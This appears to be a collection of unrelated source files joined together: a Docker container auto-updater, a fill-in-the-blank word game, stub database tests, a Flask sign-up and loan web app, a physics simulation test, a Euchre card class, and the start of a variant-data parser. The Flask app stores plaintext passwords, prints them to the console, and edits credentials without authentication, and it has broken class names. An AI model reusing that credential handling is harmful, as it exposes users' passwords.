if '<html>' in str(e):
self.logger.debug("Docker api issue. Ignoring")
raise ConnectionError
elif 'unauthorized' in str(e):
if self.config.dry_run:
self.logger.error('dry run : Upstream authentication issue while checking %s. See: '
'https://github.com/docker/docker-py/issues/2225', tag)
raise ConnectionError
else:
self.logger.critical("Invalid Credentials. Exiting")
exit(1)
elif 'Client.Timeout' in str(e):
self.logger.critical(
"Couldn't find an image on docker.com for %s. Local Build?", tag)
raise ConnectionError
elif ('pull access' or 'TLS handshake') in str(e):
self.logger.critical("Couldn't pull. Skipping. Error: %s", e)
raise ConnectionError
class Container(BaseImageObject):
mode = 'container'
def __init__(self, docker_client):
super().__init__(docker_client)
self.monitored = self.monitor_filter()
# Container sub functions
def stop(self, container):
self.logger.debug('Stopping container: %s', container.name)
stop_signal = container.labels.get('com.ouroboros.stop_signal', False)
if stop_signal:
try:
container.kill(signal=stop_signal)
except APIError as e:
self.logger.error('Cannot kill container using signal %s. stopping normally. Error: %s',
stop_signal, e)
container.stop()
else:
container.stop()
def remove(self, container):
self.logger.debug('Removing container: %s', container.name)
try:
container.remove()
except NotFound as e:
self.logger.error("Could not remove container. Error: %s", e)
return
def recreate(self, container, latest_image):
new_config = set_properties(old=container, new=latest_image)
self.stop(container)
self.remove(container)
created = self.client.api.create_container(**new_config)
new_container = self.client.containers.get(created.get("Id"))
# connect the new container to all networks of the old container
for network_name, network_config in container.attrs['NetworkSettings']['Networks'].items():
network = self.client.networks.get(network_config['NetworkID'])
try:
network.disconnect(new_container.id, force=True)
except APIError:
pass
new_network_config = {
'container': new_container,
'aliases': network_config['Aliases'],
'links': network_config['Links']
}
if network_config['IPAMConfig']:
new_network_config.update(
{
'ipv4_address': network_config['IPAddress'],
'ipv6_address': network_config['GlobalIPv6Address']
}
)
try:
network.connect(**new_network_config)
except APIError as e:
if any(err in str(e) for err in ['user configured subnets', 'user defined networks']):
if new_network_config.get('ipv4_address'):
del new_network_config['ipv4_address']
if new_network_config.get('ipv6_address'):
del new_network_config['ipv6_address']
network.connect(**new_network_config)
else:
self.logger.error('Unable to attach updated container to network "%s". Error: %s', network.name, e)
new_container.start()
def pull(self, current_tag):
"""Docker pull image tag"""
tag = current_tag
if not tag:
self.logger.error('Missing tag. Skipping...')
raise ConnectionError
elif ':' not in tag:
tag = f'{tag}:latest'
return self._pull(tag)
# Filters
def running_filter(self):
"""Return running container objects list, except ouroboros itself"""
running_containers = []
try:
for container in self.client.containers.list(filters={'status': 'running'}):
if self.config.self_update:
running_containers.append(container)
else:
try:
if 'ouroboros' not in container.image.tags[0]:
if container.attrs['HostConfig']['AutoRemove']:
self.logger.debug("Skipping %s due to --rm property.", container.name)
else:
running_containers.append(container)
except IndexError:
self.logger.error("%s has no tags.. you should clean it up! Ignoring.", container.id)
continue
except DockerException:
self.logger.critical("Can't connect to Docker API at %s", self.config.docker_socket)
exit(1)
return running_containers
def monitor_filter(self):
"""Return filtered running container objects list"""
running_containers = self.running_filter()
monitored_containers = []
for container in running_containers:
ouro_label = container.labels.get('com.ouroboros.enable', False)
# if labels enabled, use the label. 'true/yes' trigger monitoring.
if self.config.label_enable and ouro_label:
if ouro_label.lower() in ["true", "yes"]:
monitored_containers.append(container)
else:
continue
elif not self.config.labels_only:
if self.config.monitor:
if container.name in self.config.monitor and container.name not in self.config.ignore:
monitored_containers.append(container)
elif container.name not in self.config.ignore:
monitored_containers.append(container)
self.data_manager.monitored_containers[self.socket] = len(monitored_containers)
self.data_manager.set(self.socket)
return monitored_containers
# Socket Functions
def self_check(self):
if self.config.self_update:
me_list = [container for container in self.client.containers.list() if 'ouroboros' in container.name]
if len(me_list) > 1:
self.update_self(count=2, me_list=me_list)
def socket_check(self):
depends_on_names = []
hard_depends_on_names = []
updateable = []
self.monitored = self.monitor_filter()
if not self.monitored:
self.logger.info('No containers are running or monitored on %s', self.socket)
return
for container in self.monitored:
current_image = container.image
current_tag = container.attrs['Config']['Image']
try:
latest_image = self.pull(current_tag)
except ConnectionError:
continue
try:
if current_image.id != latest_image.id:
updateable.append((container, current_image, latest_image))
else:
continue
except AttributeError:
self.logger.error("Issue detecting %s's image tag. Skipping...", container.name)
# Get container list to restart after update complete
depends_on = container.labels.get('com.ouroboros.depends_on', False)
hard_depends_on = container.labels.get('com.ouroboros.hard_depends_on', False)
if depends_on:
depends_on_names.extend([name.strip() for name in depends_on.split(',')])
if hard_depends_on:
hard_depends_on_names.extend([name.strip() for name in hard_depends_on.split(',')])
hard_depends_on_containers = []
hard_depends_on_names = list(set(hard_depends_on_names))
for name in hard_depends_on_names:
try:
hard_depends_on_containers.append(self.client.containers.get(name))
except NotFound:
self.logger.error("Could not find dependant container %s on socket %s. Ignoring", name, self.socket)
depends_on_containers = []
depends_on_names = list(set(depends_on_names))
depends_on_names = [name for name in depends_on_names if name not in hard_depends_on_names]
for name in depends_on_names:
try:
depends_on_containers.append(self.client.containers.get(name))
except NotFound:
self.logger.error("Could not find dependant container %s on socket %s. Ignoring", name, self.socket)
return updateable, depends_on_containers, hard_depends_on_containers
def update(self):
updated_count = 0
try:
updateable, depends_on_containers, hard_depends_on_containers = self.socket_check()
except TypeError:
return
for container in depends_on_containers + hard_depends_on_containers:
self.stop(container)
for container, current_image, latest_image in updateable:
if self.config.dry_run:
# Ugly hack for repo digest
repo_digest_id = current_image.attrs['RepoDigests'][0].split('@')[1]
if repo_digest_id != latest_image.id:
self.logger.info('dry run : %s would be updated', container.name)
continue
if container.name in ['ouroboros', 'ouroboros-updated']:
self.data_manager.total_updated[self.socket] += 1
self.data_manager.add(label=container.name, socket=self.socket)
self.data_manager.add(label='all', socket=self.socket)
self.notification_manager.send(container_tuples=updateable,
socket=self.socket, kind='update')
self.update_self(old_container=container, new_image=latest_image, count=1)
self.logger.info('%s will be updated', container.name)
self.recreate(container, latest_image)
if self.config.cleanup:
try:
self.client.images.remove(current_image.id)
except APIError as e:
self.logger.error("Could not delete old image for %s, Error: %s", container.name, e)
updated_count += 1
self.logger.debug("Incrementing total container updated count")
self.data_manager.total_updated[self.socket] += 1
self.data_manager.add(label=container.name, socket=self.socket)
self.data_manager.add(label='all', socket=self.socket)
for container in depends_on_containers:
# Reload container to ensure it isn't referencing the old image
container.reload()
container.start()
for container in hard_depends_on_containers:
self.recreate(container, container.image)
if updated_count > 0:
self.notification_manager.send(container_tuples=updateable, socket=self.socket, kind='update')
def update_self(self, count=None, old_container=None, me_list=None, new_image=None):
if count == 2:
self.logger.debug('God im messy... cleaning myself up.')
old_me_id = me_list[0].id if me_list[0].attrs['Created'] < me_list[1].attrs['Created'] else me_list[1].id
old_me = self.client.containers.get(old_me_id)
old_me_image_id = old_me.image.id
old_me.stop()
old_me.remove()
self.client.images.remove(old_me_image_id)
self.logger.debug('Ahhh. All better.')
self.monitored = self.monitor_filter()
elif count == 1:
self.logger.debug('I need to update! Starting the ouroboros ;)')
self_name = 'ouroboros-updated' if old_container.name == 'ouroboros' else 'ouroboros'
new_config = set_properties(old=old_container, new=new_image, self_name=self_name)
try:
me_created = self.client.api.create_container(**new_config)
new_me = self.client.containers.get(me_created.get("Id"))
new_me.start()
self.logger.debug('If you strike me down, I shall become '
'more powerful than you could possibly imagine.')
self.logger.debug('https://bit.ly/2VVY7GH')
sleep(30)
except APIError as e:
self.logger.error("Self update failed.")
self.logger.error(e)
class Service(BaseImageObject):
mode = 'service'
def __init__(self, docker_client):
super().__init__(docker_client)
self.monitored = self.monitor_filter()
def monitor_filter(self):
"""Return filtered service objects list"""
services = self.client.services.list(filters={'label': 'com.ouroboros.enable'})
monitored_services = []
for service in services:
ouro_label = service.attrs['Spec']['Labels'].get('com.ouroboros.enable')
if not self.config.label_enable or ouro_label.lower() in ["true", "yes"]:
monitored_services.append(service)
self.data_manager.monitored_containers[self.socket] = len(monitored_services)
self.data_manager.set(self.socket)
return monitored_services
def pull(self, tag):
"""Docker pull image tag"""
return self._pull(tag)
def update(self):
updated_service_tuples = []
self.monitored = self.monitor_filter()
if not self.monitored:
self.logger.info('No services monitored')
for service in self.monitored:
image_string = service.attrs['Spec']['TaskTemplate']['ContainerSpec']['Image']
if '@' in image_string:
tag = image_string.split('@')[0]
sha256 = remove_sha_prefix(image_string.split('@')[1])
else:
self.logger.error('No image SHA for %s. Skipping', image_string)
continue
try:
latest_image = self.pull(tag)
except ConnectionError:
continue
latest_image_sha256 = get_digest(latest_image)
self.logger.debug('Latest sha256 for %s is %s', tag, latest_image_sha256)
if sha256 != latest_image_sha256:
if self.config.dry_run:
# Ugly hack for repo digest
self.logger.info('dry run : %s would be updated', service.name)
continue
updated_service_tuples.append(
(service, sha256[-10:], latest_image)
)
if 'ouroboros' in service.name and self.config.self_update:
self.data_manager.total_updated[self.socket] += 1
self.data_manager.add(label=service.name, socket=self.socket)
self.data_manager.add(label='all', socket=self.socket)
self.notification_manager.send(container_tuples=updated_service_tuples,
socket=self.socket, kind='update', mode='service')
self.logger.info('%s will be updated', service.name)
service.update(image=f"{tag}@sha256:{latest_image_sha256}")
self.data_manager.total_updated[self.socket] += 1
self.data_manager.add(label=service.name, socket=self.socket)
self.data_manager.add(label='all', socket=self.socket)
if updated_service_tuples:
self.notification_manager.send(
container_tuples=updated_service_tuples,
socket=self.socket,
kind='update',
mode='service'
)
|
# IPND Stage 2 Final Project
# Titles for the story
titles = ["A Bunny Story", "Kites", "The Cat"]
# A Bunny Story fill-in-the-blanks and its corresponding answers.
bunny_story = "Once there was an ugly __1__ named Kevin. He was __2__ and nobody liked him. One day there was a Bhutan Marathon and the ugly bunny __3__ it. He got a __4__ and then everybody liked him. He made lots of new __5__ and lived happily ever after."
bunny_answers = ["bunny", "ugly", "won", "medal", "friends"]
# Kites story fill-in-the-blanks and its corresponding answers
kites_story = "There was once a boy called Sam. He was very __1__. He lived with his __2__ named Sigrid. One day he found __3__ gold coins and __4__ silver coins. Then he went and bought some paper and crayons, made __5__ kites and sold them. Then he took the money and bought a wardrobe, a car, a black dress for his mom and lots of gifts for his house and became very __6__."
kites_answers = ["poor", "mother", "50", "25", "1000", "rich"]
# The Cat story fill-in-the-blanks and its corresponding answers
cat_story = "Once upon a time there was a __1__ named Susan. She __2__ cats. She __3__ had a cat before but one day she got a cat for her now and then. The cat's name was Harry. Susan loved Harry. She __4__ with it and __5__ it sooo much. Her __6__ named Robb, disliked the cat but her mom loved it. Susan __7__ it and loved it so much. They all lived very ever after."
cat_answers = ["girl", "loved", "never", "slept", "loved", "dad", "pet"]
def load_fib_category():
"""
Asks the user for a category and load that data.
Args:
none.
Returns:
print title and story that are selected.
return function guess_check to check the correct answer.
"""
category = raw_input("\nPlease select a category for the story (bunny, kites, cat): ")
if category.lower() == "bunny":
print "\n" + titles[0]
print "\n" + bunny_story
return guess_check(titles[0], bunny_story, bunny_answers)
if category.lower() == "kites":
print "\n" + titles[1]
print "\n" + kites_story
return guess_check(titles[1], kites_story, kites_answers)
if category.lower() == "cat":
print "\n" + titles[2]
print "\n" + cat_story
return guess_check(titles[2], cat_story, cat_answers)
else:
print "You selected an invalid category!"
return load_fib_category()
def guess_check(title, prompt, answers):
"""
Asks the user for a guess. If correct, moves to the next blank.
Prompts the user to fill in the first blank. Displays the updated
fill-in-the-blank when the user inputs the correct answer and prompts them
to fill in the next blank. Prompts the user to try again when their guess
is incorrect.
Args:
title (str) : the title for the story selected.
prompt (str) : the story.
answers (list of str) : list of the answer.
Returns:
print 'Good job' if the answer is right and continue the loop.
print 'Try again' if the answer is wrong and return the loop.
print 'Congratulations,...' if you completed the story.
"""
idx = 1
while idx <= len(answers):
user_input = raw_input("\nWhat is the answer to __" + str(idx) + "__? ")
if user_input == answers[idx-1]:
print "Good job!" + "\n"
idx += 1
prompt = prompt.replace("__" + str(idx-1) + "__", user_input)
print title + "\n\n" + prompt
else:
print "Try again.\n" + "\n" + title + "\n\n" + prompt
print "Congratulations, you have filled in all of the blanks!"
def play_game():
"""
Plays a full game of fill-in-the-blanks.
Displays the chosen empty fill-in-the-blank. Ask the user if want to play
another round. If 'yes' selected, continue the game.
Args:
none.
Returns:
if 'yes' selected, continue the game.
if 'no' selected, stop the game.
"""
load_fib_category()
yes = ['yes', 'YES', 'y', 'Y']
no = ['no', 'NO', 'n', 'N']
user_input = raw_input("Would you play another round? (yes/no) : ")
if user_input in yes:
play_game()
else:
print "Thanks for playing!"
play_game()
|
<reponame>Sentienz/datacollector-tests
import pytest
from streamsets.testframework.decorators import stub
@stub
@pytest.mark.parametrize('stage_attributes', [{'add_unsupported_fields_to_records': False},
{'add_unsupported_fields_to_records': True}])
def test_add_unsupported_fields_to_records(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'resolve_schema_from_db': True}])
def test_additional_jdbc_configuration_properties(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'case_sensitive_names': False}, {'case_sensitive_names': True}])
def test_case_sensitive_names(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
def test_date_format(sdc_builder, sdc_executor):
pass
@stub
def test_db_time_zone(sdc_builder, sdc_executor):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'resolve_schema_from_db': True}])
def test_jdbc_connection_string(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'on_record_error': 'DISCARD'},
{'on_record_error': 'STOP_PIPELINE'},
{'on_record_error': 'TO_ERROR'}])
def test_on_record_error(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'resolve_schema_from_db': True, 'use_credentials': True}])
def test_password(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
def test_preconditions(sdc_builder, sdc_executor):
pass
@stub
def test_required_fields(sdc_builder, sdc_executor):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'resolve_schema_from_db': False}, {'resolve_schema_from_db': True}])
def test_resolve_schema_from_db(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
def test_sql_field(sdc_builder, sdc_executor):
pass
@stub
def test_target_field(sdc_builder, sdc_executor):
pass
@stub
def test_timestamp_with_local_timezone_format(sdc_builder, sdc_executor):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'unsupported_field_type': 'DISCARD'},
{'unsupported_field_type': 'SEND_TO_PIPELINE'},
{'unsupported_field_type': 'TO_ERROR'}])
def test_unsupported_field_type(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'resolve_schema_from_db': True, 'use_credentials': False},
{'resolve_schema_from_db': True, 'use_credentials': True}])
def test_use_credentials(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'resolve_schema_from_db': True, 'use_credentials': True}])
def test_username(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
def test_zoned_datetime_format(sdc_builder, sdc_executor):
pass
|
#!/usr/bin/python3 Bash
""" RapScore Flask routing file """
from flask import Flask, render_template, request, redirect, jsonify
from models import storage
from models.address import Address
from models.contact_info import Contact_info
from models.investment import Investment
from models.tourist import tourist
from models.loan import Loan
from models.person import Person
from models.request import Request
from models.type_loan import Type_loan
from models.user import User
from models.Guide import Guide
import uuid
app = Flask(__name__)
# Close session when error connection to database
@app.teardown_appcontext
def close_db(error):
"""
Remove SQLalchemy session
Closes an open session
"""
storage.close()
# Print error when API fails.
@app.errorhandler(400)
def error_db(error):
"""
Remove SQLalchemy session
When an error 400 appears show
the error in terminal
"""
print(error)
# Home landing web appplication page
# This home page is where the client lands for the first time
# to read about the project and choos which type of account it wants.
@app.route('/')
@app.route('/home', strict_slashes=False)
def index():
""" Display index html """
return render_template('index.html', id=str(uuid.uuid4()))
# SIGNIN OPTION
# Login in is an option for already subscribed clients.
@app.route('/signin', strict_slashes=False, methods=['POST'])
def sign_in():
""" Method that searches login credentials in database """
try:
print("enter signin")
form = request.form.to_dict(flat=False)
print(form.keys())
user = form['email'][0]
passd = form['password'][0]
print(user, passd)
users = storage.all(User)
print(users)
for us in users.values():
if us.email == user and us.psswd == passd:
user = us
persons = storage.all(Person)
for per in persons.values():
if per.user == user.id:
person = per
print(person.id)
guide = storage.all(Guide)
for wor in guide.values():
if wor.guide == person.id:
return redirect('/profileguide/{}'.format(person.id), code=302)
tourists = storage.all(Tourist)
for inv in tourists.values():
if inv.tourist == person.id:
return redirect('/profile-tourist/{}'.format(person.id), code=302)
# return redirect('/home')
except Exception as e:
print(e)
return redirect('/home')
# touristS TWO FIRST OPTIONS PAGE
# tourists can choose from two profiles, PERSON or COMPANY
@app.route('/signup/id', strict_slashes=False)
def tourist():
""" Display tourists html """
return render_template('s_tourist.html', id=str(uuid.uuid4()))
# Guide SUBCRIPTION PAGE
# The client (Guide) can create an account from this page
@app.route('/signup/id-Guide', strict_slashes=False, methods=['POST', 'GET'])
def id_Guide():
""" Guide subscription form """
if request.method == "POST":
info = request.form
obj = User()
obj.username = info['username']
obj.email = info['email']
obj.psswd = info['password']
obj.status = "active"
data = Person()
data.user = obj.id
data.first_name = info['fname']
data.last_name = info['lname']
data.type_id = info['tipo-identificacion']
data.number_identification = info['numberID']
data.born_date = info['date']
wor = Guide()
wor.Guide = data.id
mka = storage
mka.reload()
mka.new(obj)
mka.save()
mka.new(data)
mka.save()
mka.new(wor)
mka.save()
mka.close()
return redirect('/profile-Guide/{}'.format(data.id), code=302)
return render_template('sign_up_Guide.html', id=str(uuid.uuid4()))
# MAIN Guide PAGE
@app.route('/profile-Guide/<person_id>', strict_slashes=False, methods=['POST', 'GET'])
def profile_Guide(person_id):
""" Guide profile edit profile form """
print("profile Guide", request.method)
if request.method == "POST":
print("mijo")
info = request.form
contacts = storage.all(Contact_info)
number = None
for contact in contacts.values():
if contact.person == person_id:
number = contact
if number is None:
number = Contact_info()
number.person = person_id
number.type_contact = info['type-contact']
number.data_contact = info['data-contact']
addresses = storage.all(Address)
add = None
for adding in addresses.values():
if adding.person == person_id:
add = adding
if add is None:
add = Address()
add.address = info['address']
add.person = person_id
objects = storage.all(Person)
obj = None
for ob in objects.values():
if ob.id == person_id:
obj = storage.get(User, ob.user)
if obj is None:
obj = User()
obj.email = info['email']
obj.psswd = info['password']
mka = storage
mka.new(number)
mka.save()
mka.new(add)
mka.save()
mka.new(obj)
mka.save()
mka.close()
return redirect('/profile-Guide/{}'.format(obj.id), code=302)
print(person_id)
return render_template('profile_Guide.html', id=str(uuid.uuid4()), person_id=person_id)
# This code gets the information from the database to display in already
# filled fields from the clients profile. When the edit window popups, fields
# should have the information already added to the system. This feature is not
# active.
@app.route('/profile-Guide/<person_id>/info', strict_slashes=False, methods=['GET'])
def get_person_info(person_id):
""" Method that gets info to post in edit profile form filled fields """
print("getting user info")
contacts = storage.all(Contact_info)
for contact in contacts.values():
if contact.person == person_id:
number = contact
if number is None:
number = Contact_info()
addresses = storage.all(Address)
for adding in addresses.values():
if adding.person == person_id:
add = adding
if add is None:
add = Address()
objects = storage.all(Person)
for ob in objects.values():
if ob.id == person_id:
obj = storage.get(User, ob.user)
if obj is None:
obj = User()
resp = {}
resp['contact'] = number.type_contact
resp['address'] = add.address
resp['user'] = obj.email
print(resp)
return jsonify(resp), 200
# Apply loan html
# This section is for Guides to request a loan.
@app.route('/apply-loan/<Guide_id>', strict_slashes=False, methods=['POST', 'GET'])
def apply_tourme(Guide_id):
"""
Display Guides apply-loan html fill out form
"""
if request.method == "POST":
info = request.form
Guides = storage.all(Guide)
number = None
for wor in Guides.values():
if wor.Guide == Guide_id:
number = wor
if number is None:
number = Guide()
number.Guide = Guide_id
number.request_date = info['date']
number.type_toure = info['type-toure']
number.amount_request = info['amount']
mka = storage
mka.new(number)
mka.save()
mka.close()
return redirect('/loan-details/{}'.format(number.id), code=302)
return render_template('apply_tourme.html', id=str(uuid.uuid4()), person_id=Guide_id)
# Loan details site
# This sections displays loan details requested. This site is not active
@app.route('/loan-details', strict_slashes=False)
def tourme_details():
""" Display Guides loan-details """
return render_template('tourme_details.html', id=str(uuid.uuid4()))
# When a client chooses tourist option, here they will be able to
# create a new user by filling the form.
@app.route('/users/id-person', strict_slashes=False, methods=['POST', 'GET'])
def tourist_person():
""" Display tourists subscription for a person form """
if request.method == "POST":
info = request.form
obj = User()
obj.username = info['username']
obj.email = info['email']
obj.psswd = info['password']
obj.status = "active"
data = Person()
data.user = obj.id
data.first_name = info['fname']
data.last_name = info['lname']
data.type_id = info['type-identificacion']
data.number_identification = info['numberID']
data.born_date = info['date']
inv = turist()
inv.turist = data.id
mka = storage
mka.reload()
mka.new(obj)
mka.save()
mka.new(data)
mka.save()
mka.new(inv)
mka.save()
mka.close()
return redirect('/profile_Tourist.html/{}'.format(obj.id), code=302)
return render_template('signup_naturalperson.html', id=str(uuid.uuid4()))
# tourists subscription form
# Companies will be able to create their profile as tourists
@app.route('/users/id-company', strict_slashes=False, methods=['POST', 'GET'])
def tourist_company():
""" Display tourists subscription for a company form """
if request.method == "POST":
info = request.form
print("hola, cómo estás?")
print(info)
obj = User()
obj.username = info['username']
print(obj.username)
obj.email = info['email']
obj.psswd = info['password']
obj.status = "active"
data = Person()
data.user = obj.id
data.name_company = info['ncompany']
data.business_name = info['bname']
data.tradename = info['tname']
data.legal_status = info['lstatus']
data.legal_repre_full_name = info['lrepre_name']
data.legal_repre_type_id = info['tipo-identificacion']
data.legal_repre_number_id = info['lrepre_id']
data.born_date = info['date']
inv = tourist()
inv.tourist = data.id
mka = storage
mka.reload()
mka.new(obj)
mka.save()
mka.new(data)
mka.save()
mka.new(inv)
mka.save()
mka.close()
return redirect('/profile-tourist/{}'.format(obj.id), code=302)
return render_template('signup_company.html', id=str(uuid.uuid4()))
# Main tourists profile page
@app.route('/profile-tourist/<tourist_id>', strict_slashes=False)
def profile_tourist(tourist_id):
""" Display tourists profile, status, investment, edit profile, add bank details """
return render_template('profile_tourist.html', id=str(uuid.uuid4()))
# tourists edit profile form
@app.route('/edit-profile', strict_slashes=False)
def edit_profile():
""" Display tourists edit profile form """
return render_template('edit_profile.html', id=str(uuid.uuid4()))
# tourists investment form
@app.route('/investment', strict_slashes=False)
def investment():
""" Display tourists investment form """
return render_template('investment.html', id=str(uuid.uuid4()))
# tourists add bank details form when adding new bank accounts
@app.route('/bank-details', strict_slashes=False)
def bank_details():
""" Display bank details form """
return render_template('bank_details.html', id=str(uuid.uuid4()))
# Test Deployment Strategy for adding new features or trying out new ones.
@app.route('/tests', strict_slashes=False)
def tests():
""" Display tests
Tests was made to make tests before adding any new features to the code
as Deployment Strategy
"""
return render_template('tests.html', id=str(uuid.uuid4()))
if __name__ == "__main__":
""" Main Function redirecting to host 0.0.0.0 and port 5000 """
app.run(host='0.0.0.0', port=5000)
|
__author__ = 'swebb'
"""
This is a test to determine whether the two-body Coulomb attraction between
an electron and a positron is correct.
"""
from opal.fields import discrete_fourier_electrostatic as dfe
from opal.interpolaters_depositers import tent_dfes as depinterp
from opal.particles import non_rel_ptcl as ptcls
from opal.boundaries import particle_boundaries
from matplotlib import pyplot as plt
import matplotlib as mpl
#mpl.rc('font',**{'family':'sans-serif','sans-serif':[
# 'Helvetica']})
mpl.rc('font',**{'family':'serif','serif':['Palatino'], 'size':16})
mpl.rc('text', usetex=True)
__author__ = 'swebb'
__email__ = '<EMAIL>'
from opal.auxiliary import constants
import numpy as np
# Set all simulation parameters at the top for convenience
dimensions = 2
dt = 1.e-10
nsteps = 1#2*10**4
plot_potential = True
plot_diagnostics = False
# Particle properties
num_particles = 2
macro_weight = 1
num_macro = num_particles/macro_weight
simulation_lengths = np.array([30., 30.])
# Define the periodic boundary conditions
class periodic_boundary:
def __init__(self, lengths):
self.lengths = np.array(lengths)
def apply_boundary(self, particles):
particles.pos[:] = particles.pos[:] % self.lengths
my_boundary = periodic_boundary(simulation_lengths)
# Field properties
n_modes = 250
delta_k = 2*np.pi/simulation_lengths
macro_size = 0.15
# The params_dictionary for the electrostatic field + particles
sim_parameters = {}
# Simulation calls for one million electrons in a Gaussian ball Coulomb
# exploding over time
sim_parameters['number of particles'] = num_particles
sim_parameters['charge'] = -constants.elementary_charge
sim_parameters['mass'] = constants.electron_mass
sim_parameters['dimensions'] = dimensions
sim_parameters['dt'] = dt
# Number of particles per macroparticle
sim_parameters['macro weight'] = macro_weight
sim_parameters['particle size'] = np.array([macro_size, macro_size, macro_size])
# Field parameters
sim_parameters['n_modes'] = [n_modes]*dimensions# 20 modes/dimension
sim_parameters['delta k'] = delta_k
# Create the depositer/interpolater, particles, and field solvers
the_depinterp = depinterp.tent_dfes(sim_parameters)
the_particles = ptcls.non_rel_ptcl(sim_parameters)
the_fields = dfe.discrete_fourier_electrostatic(sim_parameters)
the_boundary = particle_boundaries.particle_boundaries(sim_parameters)
the_boundary.add_boundary(my_boundary)
the_depinterp.add_field(the_fields)
weight = []
pos = [0.5*(simulation_lengths[0]-1.), 0.5*simulation_lengths[1]+0.1]
vel = [0., 0.]
weight = 1.
the_particles.add_particle(pos, vel, weight)
pos = [0.5*(simulation_lengths[0]+1.), 0.5*simulation_lengths[1]+0.1]
vel = [0., 0.]
weight = -1.
the_particles.add_particle(pos, vel, weight)
# Run the simulation
the_particles.half_move_back()
for idx in range(0, nsteps):
the_particles.move()
the_depinterp.deposit_sources(the_particles.pos,
the_particles.vel,
the_particles.weights)
acceleration = the_depinterp.compute_forces(the_particles.pos,
the_particles.vel,
the_particles.weights)
the_answer = np.array([[ 6.29176115e+07, -3.91382417e-07],
[ -6.29176115e+07, -3.32348075e-07]])
error = the_answer-acceleration
#right_value =
#error_metric
print acceleration |
COLORCODE = {'Spades': 'black', 'Clubs': 'black', 'Diamonds': 'red', 'Hearts': 'red'}
class Card:
"""
Represents an individual card in the deck. Also controls the value of the cards.
"""
def __init__(self, facevalue, suit, basevalue, learner=False):
self.facevalue = facevalue
self.suit = suit
self.basevalue = basevalue
self.roundvalue = basevalue
self.color = self.get_color()
self.learner = learner
def get_value(self):
"""
Getter method which provides the value of the card
:return: int current value of the card
"""
return self.roundvalue
def set_value(self, trumpsuit=None, leadsuit=None, resetval=False, evaltrumpsuit=False, basevaluereset=False):
"""
Sets the value of the card depending on the trumpsuit, suit of card, phase of the game, etc.
:param trumpsuit: string i.e 'Spades'
:param leadsuit: string representing the first card played in a trick
:param resetval: bool 'soft' reset which doesn't change value of trumpsuited cards
:param evaltrumpsuit: bool forces change of value of trumpsuited cards
:param basevaluereset: bool 'hard' reset which restores all cards back to basevalue
:return: None
"""
if basevaluereset:
self.roundvalue = self.basevalue
if resetval and self.suit != trumpsuit and not (self.facevalue == 'J' and self.color == COLORCODE[trumpsuit]):
self.roundvalue = self.basevalue
if evaltrumpsuit:
if self.suit == trumpsuit:
self.roundvalue += 14
# Right Bower
if self.facevalue == 'J':
self.roundvalue += 5
# Left Bower
elif self.facevalue == 'J' and self.color == COLORCODE.get(trumpsuit):
self.roundvalue += 18
if leadsuit and trumpsuit != leadsuit and leadsuit == self.suit \
and not (self.facevalue == 'J' and self.color == COLORCODE[trumpsuit]):
self.roundvalue += 7
# TODO use the methods below instead of this monstrosity above
# def reset_to_base_value(self):
# self.roundvalue = self.basevalue
#
# def set_value_trump_cards(self, trumpsuit):
# if self.suit == trumpsuit:
# self.roundvalue += 14
# # Right Bower
# if self.facevalue == 'J':
# self.roundvalue += 5
# # Left Bower
# elif self.facevalue == 'J' and self.color == COLORCODE.get(trumpsuit):
# self.roundvalue += 18
#
# def set_value_lead_suit(self, leadsuit, trumpsuit):
# if trumpsuit != leadsuit and leadsuit == self.suit \
# and not (self.facevalue == 'J' and self.color == COLORCODE[trumpsuit]):
# self.roundvalue += 7
#
# def reset_non_trump_cards(self, trumpsuit):
# if self.suit != trumpsuit and not (self.facevalue == 'J' and self.color == COLORCODE[trumpsuit]):
# self.roundvalue = self.basevalue
def get_color(self):
"""
Getter method for color
:return: string i.e 'black'
"""
return COLORCODE[self.suit]
def get_suit(self):
"""
Getter method for card suit
:return: string i.e. 'Spades'
"""
return self.suit
def __repr__(self):
if self.learner:
return str((self.facevalue, self.suit, self.roundvalue))
else:
return str((self.facevalue, self.suit))
def __gt__(self, othercard):
return self.roundvalue > othercard.roundvalue
def __lt__(self, othercard):
return self.roundvalue < othercard.roundvalue
def __ge__(self, othercard):
return self.roundvalue >= othercard.roundvalue
def __le__(self, othercard):
return self.roundvalue <= othercard.roundvalue
|
#written by <NAME>
#What does this script do, you may ask.
#Good question!
#Its purpose is to take raw STMP data from the stmp TSV and properly format it for drawing by the STMP visualization program itself.
#This involves reading through the tsv, selecting values of interest, and converting them into proper "drawing vals" for the visualization.
#All that is done in here, in python.
#Python is so much easier than java, and I designed this so java does the bare minimum except drawing.e
import sys
import os
import random
import json
import drawing_functions
import pandas as pd
#we add the xls_utils file I have created to the path
#ALERT! this will have to change
xls_utils_path = '/Users/noahfriedman/Desktop/igvProject/xls_utils'
sys.path.append(xls_utils_path)
import xls_parsing_functions
#ALERT: maybe an api implements this better but basically I just want to have a variable 'X = 1 | 2' so I wrote this code
#a dictionary mapping an inuitive name (ie chromosome) to all the valid values it could have
#there are three column dicts, one for each class of variable: 'infoFields' 'numericAnnotations', 'stringAnnotations'
#The purpose of the data structures is twofold: to enumerate where different fields go, and establish mappings to deal with ambiguously named columns
#ALERT: maybe in the future this should be determined by a input parameter
infoColumnCorrespondenceDict = {
'chromosome': ('CHROM', 'Chromosome'),
'ref': ('REF', 'Reference Allele', 'Reference Nucleotide'),
'alt':('ALT', 'Sample Allele', 'Variant Nucleotide'),
'pos': ('POS', 'Position', 'Start')
}
numericColumnCorrespondenceDict = {
'fullExac': ('hg19_popfreq_all_20150413_exac_all', 'ExAC (AF%)', 'ExAC (%)', 'ExAC'),
